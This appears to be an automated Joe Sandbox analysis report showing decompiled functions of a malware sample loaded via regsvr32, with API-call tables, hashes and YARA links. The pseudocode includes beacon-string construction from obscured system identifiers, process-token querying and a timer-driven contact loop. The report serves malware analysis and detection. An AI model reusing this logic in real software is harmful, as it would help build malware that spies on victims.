memoryfiletimeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 93%

			E00F47DA3(signed char* __eax, intOrPtr* _a4) {
				signed int _v12;
				void* _v16;
				CHAR* _v20;
				struct _FILETIME _v28;
				void* _v32;
				void* _v36;
				char* _v40;
				signed int _v44;
				long _v344;
				struct _WIN32_FIND_DATAA _v368;
				signed int _t72;
				void* _t74;
				signed int _t76;
				void* _t78;
				intOrPtr _t81;
				CHAR* _t83;
				void* _t85;
				signed char _t89;
				signed char _t91;
				intOrPtr _t93;
				void* _t96;
				long _t99;
				int _t101;
				signed int _t109;
				char* _t111;
				void* _t113;
				int _t119;
				char _t128;
				void* _t134;
				signed int _t136;
				char* _t139;
				signed int _t140;
				char* _t141;
				char* _t146;
				signed char* _t148;
				int _t151;
				void* _t152;
				void* _t153;
				void* _t154;
				void* _t165;

				_v12 = _v12 & 0x00000000;
				_t148 = __eax;
				_t72 =  *0xf4d278; // 0x63699bc3
				_t74 = RtlAllocateHeap( *0xf4d238, 0, _t72 ^ 0x63699ac7);
				_v20 = _t74;
				if(_t74 == 0) {
					L36:
					return _v12;
				}
				_t76 =  *0xf4d278; // 0x63699bc3
				_t78 = RtlAllocateHeap( *0xf4d238, 0, _t76 ^ 0x63699bce);
				_t146 = 0;
				_v36 = _t78;
				if(_t78 == 0) {
					L35:
					HeapFree( *0xf4d238, _t146, _v20);
					goto L36;
				}
				_t136 =  *0xf4d278; // 0x63699bc3
				memset(_t78, 0, _t136 ^ 0x63699bce);
				_t81 =  *0xf4d27c; // 0x47ea5a8
				_t154 = _t153 + 0xc;
				_t5 = _t81 + 0xf4e7f2; // 0x73797325
				_t83 = E00F48D0B(_t5);
				_v20 = _t83;
				if(_t83 == 0) {
					L34:
					HeapFree( *0xf4d238, _t146, _v36);
					goto L35;
				}
				_t134 = 0xffffffffffffffff;
				_v28.dwLowDateTime = 0x63699bce;
				_v28.dwHighDateTime = 0x63699bce;
				_t85 = CreateFileA(_t83, 0x80000000, 1, 0, 3, 0x80, 0); // executed
				_v32 = _t85;
				if(_t85 != 0x63699bce) {
					GetFileTime(_t85,  &_v28, 0, 0);
					_v28.dwLowDateTime = _v28.dwLowDateTime + 0x2a69c000;
					asm("adc dword [ebp-0x14], 0xc9"); // executed
					FindCloseChangeNotification(_v32); // executed
				}
				 *(StrRChrA(_v20, _t146, 0x5c)) = 0;
				_t89 = 0x3c6ef35f +  *_t148 * 0x19660d;
				_t91 = 0x3c6ef35f + _t89 * 0x19660d;
				 *_t148 = _t91;
				_v32 = _t91 & 0x000000ff;
				_t93 =  *0xf4d27c; // 0x47ea5a8
				_t16 = _t93 + 0xf4e813; // 0x642e2a5c
				_v40 = _t146;
				_v44 = _t89 & 0x000000ff;
				__imp__(_v20, _t16);
				_t96 = FindFirstFileA(_v20,  &_v368); // executed
				_v16 = _t96;
				if(_t96 == _t134) {
					_t146 = 0;
					goto L34;
				}
				_t99 = CompareFileTime( &(_v368.ftLastWriteTime),  &_v28);
				while(_t99 > 0) {
					_t101 = FindNextFileA(_v16,  &_v368); // executed
					if(_t101 == 0) {
						FindClose(_v16);
						_v16 = FindFirstFileA(_v20,  &_v368);
						_v28.dwHighDateTime = _v344;
						_v28.dwLowDateTime = _v368.ftLastWriteTime.dwLowDateTime;
					}
					_t99 = CompareFileTime( &(_v368.ftLastWriteTime),  &_v28);
				}
				_v12 = _v12 & 0x00000000;
				while(1) {
					_t109 = _v44;
					if(_v12 <= _t109) {
						goto L15;
					}
					_t140 = _v12;
					if(_t140 > _v32) {
						_t141 = _v36;
						 *_a4 = _t141;
						while(1) {
							_t128 =  *_t141;
							if(_t128 == 0) {
								break;
							}
							if(_t128 < 0x30) {
								 *_t141 = _t128 + 0x20;
							}
							_t141 = _t141 + 1;
						}
						_v12 = 1;
						FindClose(_v16); // executed
						_t146 = 0;
						goto L35;
					}
					_t165 = _t140 - _t109;
					L15:
					if(_t165 == 0 || _v12 == _v32) {
						_t111 = StrChrA( &(_v368.cFileName), 0x2e);
						_t139 = _v40;
						_t151 = _t111 -  &(_v368.cFileName);
						_t113 = 0;
						if(_t139 != 0) {
							_t48 = _t151 - 4; // -4
							_t113 = _t48;
							if(_t113 > _t151) {
								_t113 = 0;
							}
						}
						if(_t151 > 4) {
							_t151 = 4;
						}
						memcpy(_v36 + _t139, _t152 + _t113 - 0x140, _t151);
						_t154 = _t154 + 0xc;
						_v40 =  &(_v40[_t151]);
					}
					do {
						_t119 = FindNextFileA(_v16,  &_v368); // executed
						if(_t119 == 0) {
							FindClose(_v16);
							_v16 = FindFirstFileA(_v20,  &_v368);
						}
					} while (CompareFileTime( &(_v368.ftLastWriteTime),  &_v28) > 0);
					_v12 = _v12 + 1;
				}
			}

0x00f47dac
0x00f47db2
0x00f47db4
0x00f47dce
0x00f47dd2
0x00f47dd5
0x00f4804a
0x00f48051
0x00f48051
0x00f47ddb
0x00f47df0
0x00f47df2
0x00f47df6
0x00f47df9
0x00f4803a
0x00f48044
0x00000000
0x00f48044
0x00f47dff
0x00f47e0a
0x00f47e0f
0x00f47e14
0x00f47e17
0x00f47e1e
0x00f47e25
0x00f47e28
0x00f4802a
0x00f48034
0x00000000
0x00f48034
0x00f47e3e
0x00f47e42
0x00f47e45
0x00f47e48
0x00f47e50
0x00f47e53
0x00f47e5c
0x00f47e62
0x00f47e6c
0x00f47e73
0x00f47e73
0x00f47e85
0x00f47e90
0x00f47e9e
0x00f47ea3
0x00f47ea8
0x00f47eab
0x00f47eb0
0x00f47eba
0x00f47ebd
0x00f47ec0
0x00f47ed6
0x00f47eda
0x00f47edd
0x00f48028
0x00000000
0x00f48028
0x00f47ef4
0x00f47f45
0x00f47f08
0x00f47f10
0x00f47f15
0x00f47f23
0x00f47f2c
0x00f47f35
0x00f47f35
0x00f47f43
0x00f47f43
0x00f47f49
0x00f47f4d
0x00f47f4d
0x00f47f53
0x00000000
0x00000000
0x00f47f55
0x00f47f5b
0x00f48002
0x00f48005
0x00f48012
0x00f48012
0x00f48016
0x00000000
0x00000000
0x00f4800b
0x00f4800f
0x00f4800f
0x00f48011
0x00f48011
0x00f4801b
0x00f48022
0x00f48024
0x00000000
0x00f48024
0x00f47f61
0x00f47f63
0x00f47f63
0x00f47f76
0x00f47f7c
0x00f47f87
0x00f47f89
0x00f47f8d
0x00f47f8f
0x00f47f8f
0x00f47f94
0x00f47f96
0x00f47f96
0x00f47f94
0x00f47f9b
0x00f47f9f
0x00f47f9f
0x00f47faf
0x00f47fb4
0x00f47fb7
0x00f47fb7
0x00f47fba
0x00f47fc4
0x00f47fcc
0x00f47fd1
0x00f47fdf
0x00f47fdf
0x00f47ff3
0x00f47ff7
0x00f47ff7

APIs

RtlAllocateHeap.NTDLL(00000000,63699BC3,00000000), ref: 00F47DCE
RtlAllocateHeap.NTDLL(00000000,63699BC3), ref: 00F47DF0
memset.NTDLL ref: 00F47E0A

Part of subcall function 00F48D0B: ExpandEnvironmentStringsA.KERNEL32(00000000,00000000,00000000,00000000,00F459DA,63699BCE,00F47E23,73797325), ref: 00F48D1C
Part of subcall function 00F48D0B: ExpandEnvironmentStringsA.KERNEL32(?,00000000,00000000,00000000), ref: 00F48D36

CreateFileA.KERNELBASE(00000000,80000000,00000001,00000000,00000003,00000080,00000000,73797325), ref: 00F47E48
GetFileTime.KERNEL32(00000000,?,00000000,00000000), ref: 00F47E5C
FindCloseChangeNotification.KERNELBASE(00000000), ref: 00F47E73
StrRChrA.SHLWAPI(?,00000000,0000005C), ref: 00F47E7F
lstrcat.KERNEL32(?,642E2A5C), ref: 00F47EC0
FindFirstFileA.KERNELBASE(?,?), ref: 00F47ED6
CompareFileTime.KERNEL32(?,?), ref: 00F47EF4
FindNextFileA.KERNELBASE(00F493A5,?), ref: 00F47F08
FindClose.KERNEL32(00F493A5), ref: 00F47F15
FindFirstFileA.KERNEL32(?,?), ref: 00F47F21
CompareFileTime.KERNEL32(?,?), ref: 00F47F43
StrChrA.SHLWAPI(?,0000002E), ref: 00F47F76
memcpy.NTDLL(00000000,?,00000000), ref: 00F47FAF
FindNextFileA.KERNELBASE(00F493A5,?), ref: 00F47FC4
FindClose.KERNEL32(00F493A5), ref: 00F47FD1
FindFirstFileA.KERNEL32(?,?), ref: 00F47FDD
CompareFileTime.KERNEL32(?,?), ref: 00F47FED
FindClose.KERNELBASE(00F493A5), ref: 00F48022
HeapFree.KERNEL32(00000000,00000000,73797325), ref: 00F48034
HeapFree.KERNEL32(00000000,?), ref: 00F48044

Memory Dump Source

Source File: 00000002.00000002.1030677795.0000000000F41000.00000020.00000001.sdmp, Offset: 00F40000, based on PE: true

Associated: 00000002.00000002.1030663345.0000000000F40000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.1030698611.0000000000F4C000.00000002.00000001.sdmp Download File
Associated: 00000002.00000002.1030711367.0000000000F4D000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.1030724379.0000000000F4F000.00000002.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_f40000_regsvr32.jbxd

Similarity

API ID: File$Find$CloseHeapTime$CompareFirst$AllocateEnvironmentExpandFreeNextStrings$ChangeCreateNotificationlstrcatmemcpymemset
String ID:
API String ID: 2944988578-0
Opcode ID: 3a69f74f3027c22b1cc91baea86fbd4508314a8f84204cf881f14b6f48c4f253
Instruction ID: 45300276ba347b919acc0c799486b1b3bc90562a334dad445b76410f3a617ed4
Opcode Fuzzy Hash: 3a69f74f3027c22b1cc91baea86fbd4508314a8f84204cf881f14b6f48c4f253
Instruction Fuzzy Hash: F2816C76D00209EFDF219FA9DC44AEEBBB9FF55310F100066E905E6260E7719A45EFA0

Uniqueness

Uniqueness Score: -1.00%

Function 00F45408, Relevance: 10.6, APIs: 7, Instructions: 81
nativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 38%

			E00F45408(char _a4, void* _a8) {
				void* _v8;
				void* _v12;
				char _v16;
				void* _v20;
				char _v24;
				char _v28;
				char _v32;
				char _v36;
				char _v40;
				void* _v44;
				void** _t33;
				void* _t40;
				void* _t43;
				void** _t44;
				intOrPtr* _t47;
				char _t48;

				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosd");
				_v20 = _a4;
				_t48 = 0;
				_v16 = 0;
				_a4 = 0;
				_v44 = 0x18;
				_v40 = 0;
				_v32 = 0;
				_v36 = 0;
				_v28 = 0;
				_v24 = 0;
				if(NtOpenProcess( &_v12, 0x400,  &_v44,  &_v20) >= 0) {
					_t33 =  &_v8;
					__imp__(_v12, 8, _t33);
					if(_t33 >= 0) {
						_t47 = __imp__;
						 *_t47(_v8, 1, 0, 0,  &_a4, _t43); // executed
						_t44 = E00F43727(_a4);
						if(_t44 != 0) {
							_t40 =  *_t47(_v8, 1, _t44, _a4,  &_a4); // executed
							if(_t40 >= 0) {
								memcpy(_a8,  *_t44, 0x1c);
								_t48 = 1;
							}
							E00F46EF8(_t44);
						}
						NtClose(_v8); // executed
					}
					NtClose(_v12);
				}
				return _t48;
			}

0x00f45415
0x00f45416
0x00f45417
0x00f45418
0x00f45419
0x00f4541d
0x00f45424
0x00f45433
0x00f45436
0x00f45439
0x00f45440
0x00f45443
0x00f45446
0x00f45449
0x00f4544c
0x00f45457
0x00f45459
0x00f45462
0x00f4546a
0x00f4546c
0x00f4547e
0x00f45488
0x00f4548c
0x00f4549b
0x00f4549f
0x00f454a8
0x00f454b0
0x00f454b0
0x00f454b2
0x00f454b2
0x00f454ba
0x00f454c0
0x00f454c4
0x00f454c4
0x00f454cf

APIs

NtOpenProcess.NTDLL(00000000,00000400,?,?), ref: 00F4544F
NtOpenProcessToken.NTDLL(00000000,00000008,?), ref: 00F45462
NtQueryInformationToken.NTDLL(?,00000001,00000000,00000000,00000000), ref: 00F4547E

Part of subcall function 00F43727: RtlAllocateHeap.NTDLL(00000000,00000000,00F443D1), ref: 00F43733

NtQueryInformationToken.NTDLL(?,00000001,00000000,00000000,00000000), ref: 00F4549B
memcpy.NTDLL(00000000,00000000,0000001C), ref: 00F454A8
NtClose.NTDLL(?), ref: 00F454BA
NtClose.NTDLL(00000000), ref: 00F454C4

Memory Dump Source

Source File: 00000002.00000002.1030677795.0000000000F41000.00000020.00000001.sdmp, Offset: 00F40000, based on PE: true

Associated: 00000002.00000002.1030663345.0000000000F40000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.1030698611.0000000000F4C000.00000002.00000001.sdmp Download File
Associated: 00000002.00000002.1030711367.0000000000F4D000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.1030724379.0000000000F4F000.00000002.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_f40000_regsvr32.jbxd

Similarity

API ID: Token$CloseInformationOpenProcessQuery$AllocateHeapmemcpy
String ID:
API String ID: 2575439697-0
Opcode ID: 8d1400805180ab62319e55984d70c2b51ec178a41bca947814cdcd41186e2f13
Instruction ID: 4016a51951f4bf66464bde46bf227f594f1fcf9378b12e20220dd32e0a7d096f
Opcode Fuzzy Hash: 8d1400805180ab62319e55984d70c2b51ec178a41bca947814cdcd41186e2f13
Instruction Fuzzy Hash: BF2116B690121CBBDB01EF95CC859DEBFBDEF59B50F104026F904EA121D7758A44ABA0

Uniqueness

Uniqueness Score: -1.00%

Function 00F411FA, Relevance: 33.2, APIs: 22, Instructions: 245
memorystringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 74%

			E00F411FA(long __eax, void* __ecx, void* __edx, intOrPtr _a4, char** _a8, int* _a12, void* _a16) {
				void* _v8;
				signed int _v12;
				void* _v16;
				void* _v20;
				void* _v24;
				void* _v28;
				void* __ebx;
				void* __edi;
				long _t59;
				intOrPtr _t60;
				intOrPtr _t61;
				intOrPtr _t62;
				intOrPtr _t63;
				intOrPtr _t64;
				void* _t67;
				intOrPtr _t68;
				int _t71;
				void* _t72;
				void* _t73;
				void* _t75;
				void* _t78;
				intOrPtr _t82;
				intOrPtr _t86;
				intOrPtr* _t88;
				void* _t94;
				intOrPtr _t101;
				signed int _t105;
				char** _t107;
				int _t110;
				signed int _t112;
				intOrPtr* _t113;
				intOrPtr* _t115;
				intOrPtr* _t117;
				intOrPtr* _t119;
				intOrPtr _t122;
				intOrPtr _t127;
				int _t131;
				CHAR* _t133;
				intOrPtr _t134;
				void* _t135;
				void* _t144;
				int _t145;
				void* _t146;
				intOrPtr _t147;
				void* _t149;
				long _t153;
				intOrPtr* _t154;
				intOrPtr* _t155;
				intOrPtr* _t158;
				void* _t159;
				void* _t161;

				_t144 = __edx;
				_t135 = __ecx;
				_t59 = __eax;
				_v12 = 8;
				if(__eax == 0) {
					_t59 = GetTickCount();
				}
				_t60 =  *0xf4d018; // 0x639b57ef
				asm("bswap eax");
				_t61 =  *0xf4d014; // 0x3a87c8cd
				_t133 = _a16;
				asm("bswap eax");
				_t62 =  *0xf4d010; // 0xd8d2f808
				asm("bswap eax");
				_t63 =  *0xf4d00c; // 0x81762942
				asm("bswap eax");
				_t64 =  *0xf4d27c; // 0x47ea5a8
				_t3 = _t64 + 0xf4e633; // 0x74666f73
				_t145 = wsprintfA(_t133, _t3, 3, 0x3d151, _t63, _t62, _t61, _t60,  *0xf4d02c,  *0xf4d004, _t59);
				_t67 = E00F46C9B();
				_t68 =  *0xf4d27c; // 0x47ea5a8
				_t4 = _t68 + 0xf4e673; // 0x74707526
				_t71 = wsprintfA(_t145 + _t133, _t4, _t67);
				_t161 = _t159 + 0x38;
				_t146 = _t145 + _t71; // executed
				_t72 = E00F4570D(_t135); // executed
				_t134 = __imp__;
				_v8 = _t72;
				if(_t72 != 0) {
					_t127 =  *0xf4d27c; // 0x47ea5a8
					_t7 = _t127 + 0xf4e8eb; // 0x736e6426
					_t131 = wsprintfA(_a16 + _t146, _t7, _t72);
					_t161 = _t161 + 0xc;
					_t146 = _t146 + _t131;
					HeapFree( *0xf4d238, 0, _v8);
				}
				_t73 = E00F49525();
				_v8 = _t73;
				if(_t73 != 0) {
					_t122 =  *0xf4d27c; // 0x47ea5a8
					_t11 = _t122 + 0xf4e8f3; // 0x6f687726
					wsprintfA(_t146 + _a16, _t11, _t73);
					_t161 = _t161 + 0xc;
					HeapFree( *0xf4d238, 0, _v8);
				}
				_t147 =  *0xf4d32c; // 0x57395b0
				_t75 = E00F44511(0xf4d00a, _t147 + 4);
				_t153 = 0;
				_v20 = _t75;
				if(_t75 == 0) {
					L26:
					RtlFreeHeap( *0xf4d238, _t153, _a16); // executed
					return _v12;
				} else {
					_t78 = RtlAllocateHeap( *0xf4d238, 0, 0x800); // executed
					_v8 = _t78;
					if(_t78 == 0) {
						L25:
						HeapFree( *0xf4d238, _t153, _v20);
						goto L26;
					}
					E00F4A47F(GetTickCount());
					_t82 =  *0xf4d32c; // 0x57395b0
					__imp__(_t82 + 0x40);
					asm("lock xadd [eax], ecx");
					_t86 =  *0xf4d32c; // 0x57395b0
					__imp__(_t86 + 0x40);
					_t88 =  *0xf4d32c; // 0x57395b0
					_t149 = E00F48386(1, _t144, _a16,  *_t88);
					_v28 = _t149;
					asm("lock xadd [eax], ecx");
					if(_t149 == 0) {
						L24:
						RtlFreeHeap( *0xf4d238, _t153, _v8); // executed
						goto L25;
					}
					StrTrimA(_t149, 0xf4c2ac);
					_push(_t149);
					_t94 = E00F441B9();
					_v16 = _t94;
					if(_t94 == 0) {
						L23:
						HeapFree( *0xf4d238, _t153, _t149);
						goto L24;
					}
					_t154 = __imp__;
					 *_t154(_t149, _a4);
					 *_t154(_v8, _v20);
					_t155 = __imp__;
					 *_t155(_v8, _v16);
					 *_t155(_v8, _t149);
					_t101 = E00F44FD8(0, _v8);
					_a4 = _t101;
					if(_t101 == 0) {
						_v12 = 8;
						L21:
						E00F448E8();
						L22:
						HeapFree( *0xf4d238, 0, _v16);
						_t153 = 0;
						goto L23;
					}
					_t105 = E00F43FF8(_t134, 0xffffffffffffffff, _t149,  &_v24); // executed
					_v12 = _t105;
					if(_t105 == 0) {
						_t158 = _v24;
						_t112 = E00F4393E(_t158, _a4, _a8, _a12); // executed
						_v12 = _t112;
						_t113 =  *((intOrPtr*)(_t158 + 8));
						 *((intOrPtr*)( *_t113 + 0x80))(_t113);
						_t115 =  *((intOrPtr*)(_t158 + 8));
						 *((intOrPtr*)( *_t115 + 8))(_t115);
						_t117 =  *((intOrPtr*)(_t158 + 4));
						 *((intOrPtr*)( *_t117 + 8))(_t117);
						_t119 =  *_t158;
						 *((intOrPtr*)( *_t119 + 8))(_t119);
						E00F46EF8(_t158);
					}
					if(_v12 != 0x10d2) {
						L16:
						if(_v12 == 0) {
							_t107 = _a8;
							if(_t107 != 0) {
								_t150 =  *_t107;
								_t156 =  *_a12;
								wcstombs( *_t107,  *_t107,  *_a12);
								_t110 = E00F4A6BF(_t150, _t150, _t156 >> 1);
								_t149 = _v28;
								 *_a12 = _t110;
							}
						}
						goto L19;
					} else {
						if(_a8 != 0) {
							L19:
							E00F46EF8(_a4);
							if(_v12 == 0 || _v12 == 0x10d2) {
								goto L22;
							} else {
								goto L21;
							}
						}
						_v12 = _v12 & 0x00000000;
						goto L16;
					}
				}
			}

0x00f411fa
0x00f411fa
0x00f411fa
0x00f41205
0x00f4120c
0x00f4120e
0x00f4120e
0x00f4121b
0x00f41226
0x00f41229
0x00f4122e
0x00f41237
0x00f4123a
0x00f4123f
0x00f41242
0x00f41247
0x00f4124a
0x00f41256
0x00f41263
0x00f41265
0x00f4126b
0x00f41270
0x00f4127b
0x00f4127d
0x00f41280
0x00f41282
0x00f41289
0x00f4128f
0x00f41292
0x00f41295
0x00f4129a
0x00f412a7
0x00f412a9
0x00f412af
0x00f412b9
0x00f412b9
0x00f412bb
0x00f412c2
0x00f412c5
0x00f412c8
0x00f412cd
0x00f412da
0x00f412dc
0x00f412ea
0x00f412ea
0x00f412ec
0x00f412fa
0x00f412ff
0x00f41303
0x00f41306
0x00f414c9
0x00f414d3
0x00f414dc
0x00f4130c
0x00f41318
0x00f41320
0x00f41323
0x00f414bd
0x00f414c7
0x00000000
0x00f414c7
0x00f4132f
0x00f41334
0x00f4133d
0x00f4134e
0x00f41352
0x00f4135b
0x00f41361
0x00f41370
0x00f41377
0x00f41380
0x00f41386
0x00f414b1
0x00f414bb
0x00000000
0x00f414bb
0x00f41392
0x00f41398
0x00f41399
0x00f413a0
0x00f413a3
0x00f414a7
0x00f414af
0x00000000
0x00f414af
0x00f413ac
0x00f413b3
0x00f413bb
0x00f413c0
0x00f413c9
0x00f413cf
0x00f413d6
0x00f413dd
0x00f413e0
0x00f414df
0x00f41493
0x00f41493
0x00f41498
0x00f414a3
0x00f414a5
0x00000000
0x00f414a5
0x00f413ea
0x00f413f1
0x00f413f4
0x00f413f9
0x00f41404
0x00f41409
0x00f4140c
0x00f41412
0x00f41418
0x00f4141e
0x00f41421
0x00f41427
0x00f4142a
0x00f4142f
0x00f41433
0x00f41433
0x00f4143f
0x00f4144b
0x00f4144f
0x00f41451
0x00f41456
0x00f41458
0x00f4145d
0x00f41462
0x00f4146f
0x00f41477
0x00f4147a
0x00f4147a
0x00f41456
0x00000000
0x00f41441
0x00f41445
0x00f4147c
0x00f4147f
0x00f41488
0x00000000
0x00000000
0x00000000
0x00000000
0x00f41488
0x00f41447
0x00000000
0x00f41447
0x00f4143f

APIs

GetTickCount.KERNEL32 ref: 00F4120E
wsprintfA.USER32 ref: 00F4125E
wsprintfA.USER32 ref: 00F4127B
wsprintfA.USER32 ref: 00F412A7
HeapFree.KERNEL32(00000000,?), ref: 00F412B9
wsprintfA.USER32 ref: 00F412DA
HeapFree.KERNEL32(00000000,?), ref: 00F412EA
RtlAllocateHeap.NTDLL(00000000,00000800), ref: 00F41318
GetTickCount.KERNEL32 ref: 00F41329
RtlEnterCriticalSection.NTDLL(05739570), ref: 00F4133D
RtlLeaveCriticalSection.NTDLL(05739570), ref: 00F4135B

Part of subcall function 00F48386: lstrlen.KERNEL32(00000000,253D7325,00000000,00000000,745EC740,?,?,00F4987D,?,057395B0), ref: 00F483B1
Part of subcall function 00F48386: lstrlen.KERNEL32(?,?,?,00F4987D,?,057395B0), ref: 00F483B9
Part of subcall function 00F48386: strcpy.NTDLL ref: 00F483D0
Part of subcall function 00F48386: lstrcat.KERNEL32(00000000,?), ref: 00F483DB
Part of subcall function 00F48386: StrTrimA.SHLWAPI(00000000,=,00000000,00000000,?,?,?,00F4987D,?,057395B0), ref: 00F483F8

StrTrimA.SHLWAPI(00000000,00F4C2AC,?,057395B0), ref: 00F41392

Part of subcall function 00F441B9: lstrlen.KERNEL32(05739978,00000000,00000000,745EC740,00F498A8,00000000), ref: 00F441C9
Part of subcall function 00F441B9: lstrlen.KERNEL32(?), ref: 00F441D1
Part of subcall function 00F441B9: lstrcpy.KERNEL32(00000000,05739978), ref: 00F441E5
Part of subcall function 00F441B9: lstrcat.KERNEL32(00000000,?), ref: 00F441F0

lstrcpy.KERNEL32(00000000,?), ref: 00F413B3
lstrcpy.KERNEL32(?,?), ref: 00F413BB
lstrcat.KERNEL32(?,?), ref: 00F413C9
lstrcat.KERNEL32(?,00000000), ref: 00F413CF

Part of subcall function 00F44FD8: lstrlen.KERNEL32(?,00000000,00F4D330,00000001,00F44231,00F4D00C,00F4D00C,00000000,00000005,00000000,00000000,?,?,?,00F493A5,00F459DA), ref: 00F44FE1
Part of subcall function 00F44FD8: mbstowcs.NTDLL ref: 00F45008
Part of subcall function 00F44FD8: memset.NTDLL ref: 00F4501A

wcstombs.NTDLL ref: 00F41462

Part of subcall function 00F4393E: SysAllocString.OLEAUT32(?), ref: 00F4397F
Part of subcall function 00F4393E: IUnknown_QueryInterface_Proxy.RPCRT4(00000008,332C4425,?), ref: 00F43A01
Part of subcall function 00F4393E: StrStrIW.SHLWAPI(?,006E0069), ref: 00F43A40

Part of subcall function 00F46EF8: RtlFreeHeap.NTDLL(00000000,00000000,00F44499,00000000,?,?,00000000), ref: 00F46F04

HeapFree.KERNEL32(00000000,?,?), ref: 00F414A3
HeapFree.KERNEL32(00000000,00000000,00000000), ref: 00F414AF
RtlFreeHeap.NTDLL(00000000,?,?,057395B0), ref: 00F414BB
HeapFree.KERNEL32(00000000,?), ref: 00F414C7
RtlFreeHeap.NTDLL(00000000,?), ref: 00F414D3

Memory Dump Source

Source File: 00000002.00000002.1030677795.0000000000F41000.00000020.00000001.sdmp, Offset: 00F40000, based on PE: true

Associated: 00000002.00000002.1030663345.0000000000F40000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.1030698611.0000000000F4C000.00000002.00000001.sdmp Download File
Associated: 00000002.00000002.1030711367.0000000000F4D000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.1030724379.0000000000F4F000.00000002.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_f40000_regsvr32.jbxd

Similarity

API ID: Heap$Free$lstrlen$lstrcatwsprintf$lstrcpy$CountCriticalSectionTickTrim$AllocAllocateEnterInterface_LeaveProxyQueryStringUnknown_mbstowcsmemsetstrcpywcstombs
String ID:
API String ID: 603507560-0
Opcode ID: c923b1ec49ec8955608da77cf5d95b6b1358f22f3253e14e8368dcb1cf538912
Instruction ID: 972c8b946d25e32be35c4bf1a6adda76145cde61c4df94111b132243116faa01
Opcode Fuzzy Hash: c923b1ec49ec8955608da77cf5d95b6b1358f22f3253e14e8368dcb1cf538912
Instruction Fuzzy Hash: DB912679900208AFCB11DFA8DC88AAE7FB9FF5A350F144065FC04E7261D7759A51EBA0

Uniqueness

Uniqueness Score: -1.00%

Function 00F49E92, Relevance: 16.6, APIs: 11, Instructions: 150
timememoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 83%

			E00F49E92(intOrPtr __edx, intOrPtr _a4, intOrPtr _a8) {
				struct %anon52 _v8;
				long _v12;
				char _v16;
				char _v20;
				signed int _v24;
				intOrPtr _v32;
				union _LARGE_INTEGER _v36;
				intOrPtr _v40;
				void* _v44;
				void _v88;
				char _v92;
				struct %anon52 _t46;
				intOrPtr _t51;
				long _t53;
				void* _t54;
				struct %anon52 _t60;
				long _t64;
				signed int _t65;
				long _t67;
				void* _t68;
				void* _t70;
				signed int _t71;
				intOrPtr _t73;
				intOrPtr _t76;
				void** _t78;
				void* _t80;

				_t73 = __edx;
				_v92 = 0;
				memset( &_v88, 0, 0x2c);
				_t46 = CreateWaitableTimerA(0, 1, 0);
				_v44 = _t46;
				if(_t46 == 0) {
					_v8.LowPart = GetLastError();
				} else {
					_push(0xffffffff);
					_push(0xff676980);
					_push(0);
					_push( *0xf4d240);
					_v20 = 0;
					_v16 = 0;
					L00F4B068();
					_v36.LowPart = _t46;
					_v32 = _t73;
					SetWaitableTimer(_v44,  &_v36, 0, 0, 0, 0);
					_t51 =  *0xf4d26c; // 0x29c
					_v40 = _t51;
					_t53 = WaitForMultipleObjects(2,  &_v44, 0, 0xffffffff);
					_v8.LowPart = _t53;
					if(_t53 == 0) {
						if(_a8 != 0) {
							L4:
							 *0xf4d24c = 5;
						} else {
							_t68 = E00F43B20(_t73); // executed
							if(_t68 != 0) {
								goto L4;
							}
						}
						_v12 = 0;
						L6:
						L6:
						if(_v12 == 1 && ( *0xf4d260 & 0x00000001) == 0) {
							_v12 = 2;
						}
						_t71 = _v12;
						_t58 = _t71 << 4;
						_t76 = _t80 + (_t71 << 4) - 0x54;
						_t72 = _t71 + 1;
						_v24 = _t71 + 1;
						_t60 = E00F44BEF(_t72, _t76, _t72, _t80 + _t58 - 0x58, _t76,  &_v20,  &_v16); // executed
						_v8.LowPart = _t60;
						if(_t60 != 0) {
							goto L17;
						}
						_t65 = _v24;
						_t90 = _t65 - 3;
						_v12 = _t65;
						if(_t65 != 3) {
							goto L6;
						} else {
							_t67 = E00F4373C(_t72, _t90,  &_v92, _a4, _a8); // executed
							_v8.LowPart = _t67;
						}
						goto L12;
						L17:
						__eflags = _t60 - 0x10d2;
						if(_t60 != 0x10d2) {
							_push(0xffffffff);
							_push(0xff676980);
							_push(0);
							_push( *0xf4d244);
							goto L21;
						} else {
							__eflags =  *0xf4d248; // 0x0
							if(__eflags == 0) {
								goto L12;
							} else {
								_t60 = E00F448E8();
								_push(0xffffffff);
								_push(0xdc3cba00);
								_push(0);
								_push( *0xf4d248);
								L21:
								L00F4B068();
								_v36.LowPart = _t60;
								_v32 = _t76;
								SetWaitableTimer(_v44,  &_v36, 0, 0, 0, 0); // executed
								_t64 = WaitForMultipleObjects(2,  &_v44, 0, 0xffffffff);
								__eflags = _t64;
								_v8.LowPart = _t64;
								if(_t64 == 0) {
									goto L6;
								} else {
									goto L12;
								}
							}
						}
						L25:
					}
					L12:
					_t78 =  &_v92;
					_t70 = 3;
					do {
						_t54 =  *_t78;
						if(_t54 != 0) {
							RtlFreeHeap( *0xf4d238, 0, _t54); // executed
						}
						_t78 =  &(_t78[4]);
						_t70 = _t70 - 1;
					} while (_t70 != 0);
					CloseHandle(_v44);
				}
				return _v8;
				goto L25;
			}

0x00f49e92
0x00f49ea4
0x00f49ea7
0x00f49eb3
0x00f49ebb
0x00f49ebe
0x00f4a025
0x00f49ec4
0x00f49ec4
0x00f49ec6
0x00f49ecb
0x00f49ecc
0x00f49ed2
0x00f49ed5
0x00f49ed8
0x00f49ee6
0x00f49ef1
0x00f49ef4
0x00f49ef6
0x00f49f03
0x00f49f0d
0x00f49f11
0x00f49f14
0x00f49f19
0x00f49f24
0x00f49f24
0x00f49f1b
0x00f49f1b
0x00f49f22
0x00000000
0x00000000
0x00f49f22
0x00f49f2e
0x00000000
0x00f49f31
0x00f49f35
0x00f49f40
0x00f49f40
